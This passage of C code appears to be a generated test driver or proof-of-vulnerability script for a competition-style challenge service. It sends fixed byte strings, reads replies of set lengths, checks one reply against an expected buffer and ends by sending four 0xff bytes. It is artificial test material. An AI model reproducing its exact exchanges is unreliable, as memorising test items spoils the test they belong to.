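        static unsigned char bytes[] = "\x38\x31\x39\x36\x33\x38\x39\x30";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 8);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 4 bytes; the content is not inspected.
        unsigned int rx_len = 4;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }

    {   // Read 4 bytes; the content is not inspected.
        unsigned int rx_len = 4;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }

    {   // Read 141 bytes; compare with the letters sent earlier, followed by
        // "MMMMCCCCEEEE" and 0xed.
        static unsigned char expect[] =
            "\x47\x71\x56\x59\x4e\x4e\x43\x54\x64\x46\x54\x6f\x4a\x67\x62\x6e"
            "\x4b\x56\x73\x4e\x72\x4a\x54\x72\x42\x45\x44\x65\x50\x57\x7a\x53"
            "\x4b\x6a\x51\x51\x68\x75\x53\x6f\x74\x75\x71\x49\x4a\x70\x63\x67"
            "\x52\x49\x76\x74\x4a\x70\x49\x4d\x4c\x4b\x62\x71\x44\x79\x76\x6a"
            "\x4f\x53\x41\x47\x66\x75\x46\x6c\x4f\x41\x51\x66\x54\x4d\x64\x4e"
            "\x4d\x7a\x52\x56\x43\x48\x78\x64\x4a\x43\x5a\x53\x4a\x52\x52\x61"
            "\x4c\x63\x7a\x43\x41\x69\x6c\x66\x4f\x76\x64\x62\x6e\x4b\x6e\x48"
            "\x77\x6a\x51\x43\x7a\x6c\x4a\x61\x66\x4f\x47\x68\x6a\x5a\x5a\x41"
            "\x4d\x4d\x4d\x4d\x43\x43\x43\x43\x45\x45\x45\x45\xed";
        unsigned int rx_len = 141;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        (void)data_match(rx, rx_len, expect, 141);
        free(rx);
    }

    {   // Read 2 bytes; the content is not inspected.
        unsigned int rx_len = 2;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }

    {   // Send 4 bytes of 0xff.
        static unsigned char bytes[] = "\xff\xff\xff\xff";
        unsigned int out_len = 0;
        unsigned char *out = append_buf(NULL, &out_len, bytes, 4);

        if (out_len > 0) {
            transmit_all(1, out, out_len);
        }
        free(out);
    }

    {   // Read 2 bytes; the content is not inspected.
        unsigned int rx_len = 2;
        unsigned char *rx = malloc(rx_len);

        (void)length_read(0, rx, rx_len);
        free(rx);
    }
}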